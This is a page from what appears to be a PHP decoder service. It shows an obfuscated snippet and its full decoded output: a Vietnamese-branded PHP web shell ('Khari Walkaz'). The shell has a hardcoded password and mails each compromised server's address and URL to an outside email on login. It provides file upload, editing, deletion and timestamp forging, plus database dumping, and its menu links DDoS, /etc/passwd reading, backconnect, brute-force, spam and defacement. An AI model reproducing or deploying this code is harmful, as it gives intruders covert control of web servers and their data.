Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_F=__FILE__;$_X='Pz48P3BocCAkX0Y9X19GSUxFX187JF9YPSdQenVOQ2p3L2NHaHdEUTI2Y25JeWNsOX..

Decoded Output download

?>
<?php
error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ',microtime());
$starttime = $mtime[1] +$mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname('index.php')).'/');
define('IS_WIN',DIRECTORY_SEPARATOR == '\\');
define('IS_COM',class_exists('COM') ?1 : 0 );
define('IS_GPC',get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO',(!eregi("phpinfo",$dis_func)) ?1 : 0 );
@set_time_limit(0);
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key =>$_value) {
if ($_key{0}!= '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
$admin = array();
$admin['check'] = true;
$admin['pass']  = 'khariwalkaz@%hacking';
$admin['cookiepre'] = '';
$admin['cookiedomain'] = '';
$admin['cookiepath'] = '/';
$admin['cookielife'] = 86400;
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
}elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
}elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
}elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}
$self = $_SERVER['PHP_SELF'] ?$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
if ($action == "logout") {
scookie('kymljnk','',-86400 * 365);
p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
p('<body background=black>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('kymljnk',$password);
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = '[email protected]';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email,$server_mail,$linkcr,$header);
p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
p('<body bgcolor=black>
<BR><BR><div align=center><font color=yellow face=tahoma size=2>Ch&#224;o c&#225;c b&#7841;n nh&#7919;ng th&#224;nh vi&#234;n c&#7911;a >| Khari Walkaz |< Loading..... Please wait...<BR><img src=http://i.imgur.com/xeIh2M8.gif><img src=http://i.imgur.com/hYRZlEB.gif></div>');
exit;
}
else
{
$err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Ch&#224;o Hacker C&#243; V&#7867; b&#7841;n Kh&#244;ng Ph&#7843;i L&#224; Th&#224;nh Vi&#234;n C&#7911;a Khari Walkaz &#272;&#7915;ng C&#7889; G&#7855;ng &#272;&#259;ng Nh&#7853;p</blink><BR></font></div></td></tr></table>';
echo $err_mess;
}}
if ($_COOKIE['kymljnk']) {
if ($_COOKIE['kymljnk'] != $admin['pass']) {
loginpage();
}
}else {
loginpage();
}
}
$errmsg = '';
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
}else {
$errmsg = 'phpinfo() function has non-permissible';
}
}
if ($doing == 'downfile'&&$thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
}else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}
if ($doing == 'backupmysql'&&!$saveasfile) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$table = array_flip($table);
$result = q("SHOW tables");
if (!$result) p('<h2>'.mysql_error().'</h2>');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = ' dbname';
}else {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
}else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
$result = q("select content from tmp_angel");
q("DROP TABLE tmp_angel");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
}else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}
;echo '<html>
<link rel="shortcut icon" href="http://i.imgur.com/WtiYeZa.jpg" />
<script language="javascript">
var rev = "fwd";
function titlebar(val)
{
var msg = "::. We are Noname Team .::";
var res = " ";
var speed = 100;
var pos = val;
msg = "===> "+msg+" <===";
var le = msg.length;
if(rev == "fwd"){
if(pos < le){
pos = pos+1;
scroll = msg.substr(0,pos);
document.title = scroll;
timer = window.setTimeout("titlebar("+pos+")",speed);
}
else{
rev = "bwd";
timer = window.setTimeout("titlebar("+pos+")",speed);
}
}
else{
if(pos > 0){
pos = pos-1;
var ale = le-pos;
scrol = msg.substr(ale,le);
document.title = scrol;
timer = window.setTimeout("titlebar("+pos+")",speed);
}
else{
rev = "fwd";
timer = window.setTimeout("titlebar("+pos+")",speed);
}
}
}
titlebar(0);
</script>
<link rel="shortcut icon" href="http://i.imgur.com/WtiYeZa.jpg" />
<iframe width="0" height="0" src="https://www.youtube.com/embed/_B789lus-JE?rel=0;autoplay=1" frameborder="0" allowfullscreen></iframe>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>';echo "Website : ".$_SERVER['HTTP_HOST']."";;echo ' | ';echo "IP : ".gethostbyname($_SERVER['SERVER_NAME'])."";;echo ' </title>
<style type="text/css">
body,td{font: 10pt Tahoma;color:#00FF00;line-height: 16px;}
 
a {color: #FFFF00;text-decoration:none;}
a:hover{color: #00FF00;text-decoration:underline;}
.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:rgba(255, 255, 255, 0.12);padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:rgba(255, 0, 0, 0.65);padding:5px 10px 5px 5px;}
.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:rgba(82, 0, 255, 0.37);padding:5px 10px 5px 5px;}
.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:rgba(0, 0, 255, 0.65);padding:5px 10px 5px 5px;font-weight:bold;}
.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
input, textarea, button
{
        font-size: 9pt;
        color: #FFF;
        font-family: verdana, sans-serif;
        background-color: rgba(255, 0, 0, 0.61);
        border-left: 1px solid #74A202;
        border-top: 1px solid #74A202;
        border-right: 1px solid #74A202;
        border-bottom: 1px solid #74A202;
}
select
{
        font-size: 8pt;
        font-weight: normal;
        color: #ccc;
        font-family: verdana, sans-serif;
        background-color: #202020;
}
 
</style>
<script type="text/javascript">
function CheckAll(form) {
        for(var i=0;i<form.elements.length;i++) {
                var e = form.elements[i];
                if (e.name != \'chkall\')
                e.checked = form.chkall.checked;
    }
}
function $(id) {
        return document.getElementById(id);
}
function goaction(act){
        $(\'goaction\').action.value=act;
        $(\'goaction\').submit();
}
</script>
</head>
<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=https://media.giphy.com/media/fJ1eCBjmMoEvu/giphy.gif>
<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
                                <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
                                        <tr>
                                                <td align="center" valign=center>
                                 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">
                                   Khari Walkaz Loading<img src="http://i.imgur.com/xeIh2M8.gif">
                                  </div>
                                </td>
                                        </tr>
                                </table>
</div>
 <script>
 var ld=(document.all);
  var ns4=document.layers;
 var ns6=document.getElementById&&!document.all;
 var ie4=document.all;
  if (ns4)
        ld=document.loading;
 else if (ns6)
        ld=document.getElementById("loading").style;
 else if (ie4)
        ld=document.all.loading.style;
  function init()
 {
 if(ns4){ld.visibility="hidden";}
 else if (ns6||ie4) ld.display="none";
 }
 </script>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr class="head_small">
                <td  width=100%>
                <table width=100%><tr class="head_small"><td  width=86px><p><a title=" .:: Warning ! Shell is used to refer not to hack ::. " href="';$self;;echo '"><img src="http://i.imgur.com/WtiYeZa.jpg" height=150 width=200></a></p>
                </td>
                <td>
           
                <span style="float:left;"> ';echo "Hostname: ".$_SERVER['HTTP_HOST']."";;echo ' | Server IP: ';echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";;echo ' | Your IP: ';echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";;echo '      | <a href="https://www.facebook.com/CNTTHK" target="_blank">';echo str_replace('.','','Khari Walkaz profile');;echo ' </a> | <a href="javascript:goaction(\'logout\');"><font color=red>&#272;&#259;ng Xu&#7845;t</font></a></span> <br />
 
                ';
$curl_on = @function_exists('curl_version');
$mysql_on = @function_exists('mysql_connect');
$mssql_on = @function_exists('mssql_connect');
$pg_on = @function_exists('pg_connect');
$ora_on = @function_exists('ocilogon');
echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
echo "PHP version: <b>".@phpversion()."</b> - ";
echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b> - ";}else {echo "<font color=red>OFF</font></b> - ";}
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
;echo '</td></tr></table></td>
        </tr>
        <tr class="alt1">
                <td  width=10%>
                    <a href="javascript:goaction(\'file\');">Manager</a> |
						<a href="javascript:goaction(\'ddos\');">Khari Walkaz DDOS</a> |
                        <a href="javascript:goaction(\'jump\');">Jump</a> |
                        <a href="javascript:goaction(\'sqladmin\');">SQL</a> | 
                        <a href="javascript:goaction(\'leech\');">Leech</a> ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'dumper\');">Dumper</a>';}
                                      ;echo ' | <a href="javascript:goaction(\'md5\');">Md5</a>'
                                                  ;echo ' | <a href="javascript:goaction(\'crack\');">Crack</a>';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'etcpwd\');">/etc/passwd</a> ';}
                                      ;echo '                   ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'symlink\');">Symlink</a> ';}
                                      ;echo '                   ';
                    if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'newcommand\');">Command</a> ';}
                                                  ;echo '                       ';
                    if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'error.log\');">Cgi</a>';}
                                                  ;echo '            ';
                        if (!IS_WIN) {;echo ' | <a href="error/error.log" target="_blank">Open Cgi</a>';}
                                                  ;echo '            ';
                    if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'symroot\');">Root</a>';}
                                                  ;echo '            ';
                        if (!IS_WIN) {;echo ' | <a href="symroot.php" target="_blank">Open Root</a>';}
                                                  ;echo '                       ';
                    if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'bypass\');">By Pass</a>';}
                                                  ;echo ' ';
                                                if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'spam\');">Spam</a>';}
                                                  ;echo '  ';
                    if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'backconnect\');">Back</a>';}
                                      ;echo '                   ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'brute\');">Brute</a> ';}
                                                  ;echo '                       ';
                    if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'command\');">CM</a> ';}
                                                  ;echo '                       ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'handstool\');">Tools</a>';}
echo '                       ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'scanshell\');">Scan-Shell</a>';}
echo '                       ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'backphp\');">backphp.php</a>';}



echo '                       ';
                        if (!IS_WIN) {;echo ' | <a href="javascript:goaction(\'\');">Deface</a>';}
                                                  ;echo '


            </td>
        </tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
';
formhead(array('name'=>'goaction'));
makehide('action');
formfoot();
$errmsg &&m($errmsg);
!$dir &&$dir = '.';
$nowpath = getPath(SA_ROOT,$dir);
if (substr($dir,-1) != '/') {
$dir = $dir.'/';
}
$uedir = ue($dir);
if (!$action ||$action == 'file') {
$dir_writeable = @is_writable($nowpath) ?'Writable': 'Non-writable';
if ($doing == 'deldir'&&$thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
}else {
m('X&#243;a Th&#432; m&#7909;c '.(deltree($thefile) ?basename($thefile).' Th&#224;nh C&#244;ng': ' Th&#7845;t B&#7841;i'));
}
}
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
}else {
m('T&#7841;o Th&#432; M&#7909;c '.(@mkdir($mkdirs,0777) ?'Th&#224;nh C&#244;ng': 'Th&#7845;t B&#7841;i'));
@chmod($mkdirs,0777);
}
}
elseif ($doupfile) {
m('T&#7843;i File L&#234;n '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ?'Th&#224;nh C&#244;ng': 'Th&#7845;t B&#7841;i'));
}
elseif ($editfilename &&$filecontent) {
$fp = @fopen($editfilename,'w');
m('T&#7841;o File '.(@fwrite($fp,$filecontent) ?'Th&#224;nh C&#244;ng': 'Th&#7845;t B&#7841;i'));
@fclose($fp);
}
elseif ($pfile &&$newperm) {
if (!file_exists($pfile)) {
m('C&#225;c T&#7879;p Tin G&#7889;c Kh&#244;ng t&#7891;n T&#7841;i');
}else {
$newperm = base_convert($newperm,8,10);
m('Thay &#272;&#7893;i Thu&#7897;c T&#237;nh T&#7879;p Tin '.(@chmod($pfile,$newperm) ?' Th&#224;nh C&#244;ng': ' Th&#7845;t B&#7841;i'));
}
}
elseif ($oldname &&$newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) ||!file_exists($oldname)) {
m($nname.'C&#225;c T&#7879;p Tin M&#7909;c Ti&#234;u &#272;&#227; T&#7891;n T&#7841;i Ho&#7863;c Kh&#244;ng T&#7891;n T&#7841;i T&#7879;p Tin G&#7889;c');
}else {
m(basename($oldname).' &#272;&#7893;i T&#234;n Th&#224;nh '.basename($nname).(@rename($oldname,$nname) ?' Th&#224;nh C&#244;ng': ' Th&#7845;t B&#7841;i'));
}
}
elseif ($sname &&$tofile) {
if (file_exists($tofile) ||!file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
}else {
m(basename($tofile).' Sao Ch&#233;p '.(@copy($sname,$tofile) ?basename($tofile).' success': 'failed'));
}
}
elseif ($curfile &&$tarfile) {
if (!@file_exists($curfile) ||!@file_exists($tarfile)) {
m('C&#225;c T&#7879;p Tin M&#7909;c Ti&#234;u &#272;&#227; T&#7891;n T&#7841;i Ho&#7863;c Kh&#244;ng T&#7891;n T&#7841;i T&#7879;p Tin G&#7889;c');
}else {
$time = @filemtime($tarfile);
m('S&#7917; &#272;&#7893;i T&#7879;p Tin, S&#7917;a &#272;&#7893;i Cu&#7889;i C&#249;ng '.(@touch($curfile,$time,$time) ?'Th&#224;nh C&#244;ng': 'Th&#7845;t B&#7841;i'));
}
}
elseif ($curfile &&$year &&$month &&$day &&$hour &&$minute &&$second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' Kh&#244;ng T&#7891;n T&#7841;i');
}else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('S&#7917;a &#272;&#7893;i T&#7879;p Tin Cu&#7889;i C&#249;ng '.(@touch($curfile,$time,$time) ?' Th&#224;nh C&#244;ng': 'Th&#7845;t B&#7841;i'));
}
}
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath =>$value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
}else {
m('Please select file(s)');
}
}
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath =>$value) {
if (@unlink($filepath)) {
$succ++;
}else {
$fail++;
}
}
m('X&#243;a Th&#224;nh C&#244;ng '.$succ.' File, Th&#7845;t B&#7841;i '.$fail);
}else {
m('Please select file(s)');
}
}
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free &&$free = 0;
$all = @disk_total_space($nowpath);
!$all &&$all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
p('<font color=yellow face=tahoma size=2><B>Dung L&#432;&#7907;ng C&#7911;a Host</b> </font> Dung L&#432;&#7907;ng &#272;&#227; D&#249;ng <font color=red>'.sizecount($free).'</font> Trong T&#7893;ng  <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
;echo '<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  <form action="" method="post" id="godir" name="godir">
  <tr>
    <td nowrap>&#272;&#432;&#7901;ng D&#7851;n Hi&#7879;n T&#7841;i (';echo $dir_writeable;;echo ', ';echo getChmod($nowpath);;echo ')</td>
        <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="';echo $nowpath;;echo '" type="text" style="width:100%;margin:0 8px;"></td>
    <td nowrap><input class="bt" value="Th&#7921;c Hi&#7879;n" type="submit"></td>
  </tr>
  </form>
</table>
<script type="text/javascript">
function createdir(){
        var newdirname;
        newdirname = prompt(\'directory name:\', \'\');
        if (!newdirname) return;
        $(\'createdir\').newdirname.value=newdirname;
        $(\'createdir\').submit();
}
function fileperm(pfile){
        var newperm;
        newperm = prompt(\'Current file:\'+pfile+\'\\n new attribute:\', \'\');
        if (!newperm) return;
        $(\'fileperm\').newperm.value=newperm;
        $(\'fileperm\').pfile.value=pfile;
        $(\'fileperm\').submit();
}
function copyfile(sname){
        var tofile;
        tofile = prompt(\'Original file:\'+sname+\'\\n object file (fullpath):\', \'\');
        if (!tofile) return;
        $(\'copyfile\').tofile.value=tofile;
        $(\'copyfile\').sname.value=sname;
        $(\'copyfile\').submit();
}
function rename(oldname){
        var newfilename;
        newfilename = prompt(\'Former file name:\'+oldname+\'\\n new filename:\', \'\');
        if (!newfilename) return;
        $(\'rename\').newfilename.value=newfilename;
        $(\'rename\').oldname.value=oldname;
        $(\'rename\').submit();
}
function dofile(doing,thefile,m){
        if (m && !confirm(m)) {
                return;
        }
        $(\'filelist\').doing.value=doing;
        if (thefile){
                $(\'filelist\').thefile.value=thefile;
        }
        $(\'filelist\').submit();
}
function createfile(nowpath){
        var filename;
        filename = prompt(\'file name:\', \'\');
        if (!filename) return;
        opfile(\'editfile\',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
        $(\'fileopform\').action.value=action;
        $(\'fileopform\').opfile.value=opfile;
        $(\'fileopform\').dir.value=dir;
        $(\'fileopform\').submit();
}
function godir(dir,view_writable){
        if (view_writable) {
                $(\'godir\').view_writable.value=1;
        }
        $(\'godir\').dir.value=dir;
        $(\'godir\').submit();
}
</script>
  ';
tbhead();
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="T&#7843;i L&#234;n" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">L&#234;n &#272;&#7847;u</a>');
if ($view_writable) {
p(' | <a href="javascript:godir(\''.$nowpath.'\');">Hi&#7879;n T&#7845;t C&#7843;</a>');
}else {
p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">Ch&#7881; Hi&#7879;n Th&#432; M&#7909;c</a>');
}
p(' | <a href="javascript:createdir();">T&#7841;o Th&#432; M&#7909;c</a> | <a href="javascript:createfile(\''.$nowpath.'\');">T&#7841;o File</a>');
if (IS_WIN &&IS_COM) {
$obj = new COM('scripting.filesystemobject');
if ($obj &&is_object($obj)) {
$DriveTypeDB = array(0 =>'Unknow',1 =>'Removable',2 =>'Fixed',3 =>'Network',4 =>'CDRom',5 =>'RAM Disk');
foreach($obj->Drives as $drive) {
if ($drive->DriveType == 2) {
p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
}else {
p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
}
}
}
}
p('</td></tr></form>');
p('<tr class="head"><td>&nbsp;</td><td>T&#234;n File</td><td width="16%">L&#7847;n S&#7917;a Cu&#7889;i C&#249;ng</td><td width="10%">Kick Th&#432;&#7899;c</td><td width="20%">Chmod / Perms</td><td width="22%">C&#224;i &#272;&#7863;t</td></tr>');
$dirdata=array();
$filedata=array();
if ($view_writable) {
$dirdata = GetList($nowpath);
}else {
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath=$nowpath.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$dirdb['dirchmod']=getChmod($filepath);
$dirdb['dirperm']=getPerms($filepath);
$dirdb['fileowner']=getUser($filepath);
$dirdb['dirlink']=$nowpath;
$dirdb['server_link']=$filepath;
$dirdb['client_link']=ue($filepath);
$dirdata[]=$dirdb;
}else {
$filedb['filename']=$file;
$filedb['size']=sizecount(@filesize($filepath));
$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$filedb['filechmod']=getChmod($filepath);
$filedb['fileperm']=getPerms($filepath);
$filedb['fileowner']=getUser($filepath);
$filedb['dirlink']=$nowpath;
$filedb['server_link']=$filepath;
$filedb['client_link']=ue($filepath);
$filedata[]=$filedb;
}
}
unset($dirdb);
unset($filedb);
@closedir($dirs);
}
@sort($dirdata);
@sort($filedata);
$dir_i = '0';
foreach($dirdata as $key =>$dirdb){
if($dirdb['filename']!='..'&&$dirdb['filename']!='.') {
$thisbg = bg();
p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
p('<td width="2%" nowrap><font face="wingdings" size="3">1</font></td>');
p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
p('<td nowrap>'.$dirdb['mtime'].'</td>');
p('<td nowrap>Khari Walkaz</td>');
p('<td nowrap>');
p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'B&#7841;n Ch&#7855;c Ch&#7855;n L&#224; S&#7869; X&#243;a Th&#432; M&#7909;c '.$dirdb['filename'].' ? \\n\\nS&#7869; X&#243;a T&#7845;t C&#7843; C&#225;c File C&#243; Trong Th&#432; M&#7909;c N&#224;y.\')">x&#243;a Th&#432; M&#7909;c</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">&#272;&#7893;i T&#234;n Th&#432; M&#7909;c</a></td>');
p('</tr>');
$dir_i++;
}else {
if($dirdb['filename']=='..') {
p('<tr class=fout>');
p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">L&#234;n Tr&#234;n</a></td>');
p('</tr>');
}
}
}
p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
makehide('action','file');
makehide('thefile');
makehide('doing');
makehide('dir',$nowpath);
$file_i = '0';
foreach($filedata as $key =>$filedb){
if($filedb['filename']!='..'&&$filedb['filename']!='.') {
$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
$thisbg = bg();
p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
p('<td nowrap>'.$filedb['mtime'].'</td>');
p('<td nowrap>'.$filedb['size'].'</td>');
p('<td nowrap>');
p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
p('<td nowrap>');
p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">T&#7843;i Xu&#7889;ng</a> | ');
p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Sao Ch&#233;p</a> | ');
p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Ch&#7881;nh S&#7917;a</a> | ');
p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">&#272;&#7893;i T&#234;n</a> | ');
p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Th&#7901;i Gian</a>');
p('</td></tr>');
$file_i++;
}
}
